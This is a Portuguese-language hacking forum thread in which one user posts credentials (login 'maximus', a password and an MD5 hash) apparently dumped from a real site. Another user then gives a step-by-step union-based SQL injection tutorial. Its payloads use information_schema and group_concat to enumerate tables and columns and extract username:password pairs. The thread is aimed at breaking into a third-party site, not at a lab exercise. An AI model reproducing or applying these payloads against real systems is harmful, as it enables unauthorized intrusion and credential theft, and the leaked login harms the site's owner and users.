cara na sei dizer eu uso havij

ai o user e a senha
PAG DE LOGIN:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
LOGIM:maximus
SENHA:rfc0908

Opa amigo blz

Bom já fiz o serviço para vc

o usuario é

login maximus
senha 40a5e35c360ce8dee2db389a100d0884

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

Ate mais

Galera ele ta querendo aprender como fazer, pra não ficar pedindo toda hora '-'


viu que em vez de aparecer o conteúdo do site aparece os números 2,4,6,7 ?
estas são as colunas vulneráveis, colocamos os códigos em alguma delas para poder coletarmos as informações então o que temos que fazer agora é achar o nome do banco de dados:

faz assim:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3,4,5,6,7,8,9

no final da url insira :
e na coluna que aparece no site mude o valor para database()
ex:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,database(),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()
.
vc viu que no lugar do 2 eu coloquei "database()"? porque é uma coluna vulnerável como eu te disse, logo vai aparecer o nome do banco de dados.

================================================== =====
Depois disso:
saber o nome das tabelas
apenas mude o ex:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()
================================================== =====
agora vamos descobrir o nome de todas as colunas.
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()

vai aparecer no site todas as colunas do mesmo, vai lendo rapidinho e procura por login,password,senha,user,usuário..nomes relacionados ao login no seu caso vc tem: login,senha.
beleza ué a gente sabe que existe a coluna login e senha que é da tabela usuários(porque no seu caso não tem outras tabelas assim)
.
agora vc pega o conteúdo da coluna, a parte mais fácil da injeção(odeio agulhas):
vc irá pegar o nome da tabela que contém a coluna do login e da senha e vai até o final da url,
a partir do "from" vc apaga tudo e coloca assim "from Nome_da_tabela" ex:
Ma oee olha só olha só, quem quer dinheiro, hahae!

no lugar de group_concat(column_name) dentro dos parênteses vc coloca assim.
ex:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(usuario,0x3a,senha),3,4,5,6,7,8,9 from usuários

no site que tu quer vai ficar assim:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...,0x3a,senha%29%20from%20usuarios


ai lá na coluna vai aparecer o login:senha pois o 0x3a é o código dos 2 pontos.


PRONTO! tu acabou de aprender e já fez um SQL injection básico sem o uso de programas ;D

Orgulho da mamãe *-* qualquer duvida posta ai, e desculpa pela bagunça kk fiz o tuto agora
.

Ohniugan, Muito Obrigado voce Me Ajudou Bastante *-*

da uma olhada nesse video ae leke, vai te ajudar bastante

[ame]http://www.youtube.com/watch?v=WSmicg4d1QQ[/ame]